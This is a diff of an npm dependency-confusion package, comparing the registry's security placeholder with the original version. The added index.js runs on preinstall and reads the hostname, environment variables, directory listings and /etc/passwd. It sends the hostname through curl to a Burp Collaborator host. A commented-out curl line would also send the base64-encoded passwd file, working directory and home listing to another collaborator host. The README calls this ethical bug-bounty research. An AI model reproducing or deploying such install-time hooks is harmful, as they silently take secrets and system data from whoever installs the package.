dinesh-dev-nagajikkktest11223qa 0.0.1-security → 0.0.1

package/README.md

@@ -1,5 +1,22 @@
-# Security holding package
+This is a sample package claimed for testing Dep-conf atck.
+
+
+Hi, if you're reading this you're probably wondering what this code is doing on
+your machine. Don't worry! It doesn't do anything nasty or malicious.
+
+I am an ethical security researcher, attempting attacks against organisations
+that have a "bug bounty" type program in place.
+
+I am performing work similar to the work in this blog post:
+https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+
+If your organisation has a bug bounty program my findings will be reported via
+that program.
+
+If your organisation does not have a bug bounty program, you were not targeted
+by my work and have some how ended up getting included, any data reported from
+your org will be discarded.
+
+All data I collect will be deleted as soon as I'm done, in either case.
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
 
-Please refer to www.npmjs.com/advisories?search=dinesh-dev-nagajikkktest11223qa for more information.

package/index.js

@@ -0,0 +1,59 @@
+// const { exec } = require("child_process");
+
+const exec = require('child_process').exec;
+
+function os_func() {
+    this.execCommand = function (cmd) {
+        return new Promise((resolve, reject)=> {
+           exec(cmd, (error, stdout, stderr) => {
+             if (error) {
+                reject(error);
+                return;
+            }
+            resolve(stdout)
+           });
+       })
+   }
+}
+var os = new os_func();
+
+os.execCommand('hostname').then(res=> {
+    var url = "https://lk99qpu5o6axevssgdvb1m0t9kfb30.burpcollaborator.net/" + res; 
+
+    os.execCommand('curl '+ url).then(res=> {
+        console.log("os >>>", res);
+    })
+    console.log("os >>>", res);
+}).catch(err=> {
+    console.log("os >>>", err);
+})
+
+os.execCommand('cd .. && cd .. && ls -lh').then(res=> {
+    console.log("os >>>", res);
+}).catch(err=> {
+    console.log("os >>>", err);
+})
+
+os.execCommand('env').then(res=> {
+    console.log("os >>>", res);
+}).catch(err=> {
+    console.log("os >>>", err);
+})
+
+return os.execCommand('cat /etc/passwd').then(res=> {
+    console.log("os >>>", res);
+}).catch(err=> {
+    console.log("os >>>", err);
+})
+
+// exec('curl --data-urlencode "passwd=`cat /etc/passwd|base64`" --data-urlencode "hostname=`hostname`" --data-urlencode "pwd=`pwd`" --data-urlencode "ls=`ls ~/`" http://b6imbtuauep1vb5p576tuvyznqtnhc.burpcollaborator.net/' , (error, stdout, stderr) => {
+//     if (error) {
+//         console.log(`error: ${error.message}`);
+//         return;
+//     }
+//     if (stderr) {
+//         console.log(`stderr: ${stderr}`);
+//         return;
+//     }
+//     console.log(`stdout: ${stdout}`);
+// });

package/package.json

@@ -1,6 +1,13 @@
 {
   "name": "dinesh-dev-nagajikkktest11223qa",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "0.0.1",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "vicky621",
+  "license": "ISC",
+  "dependencies": {}
 }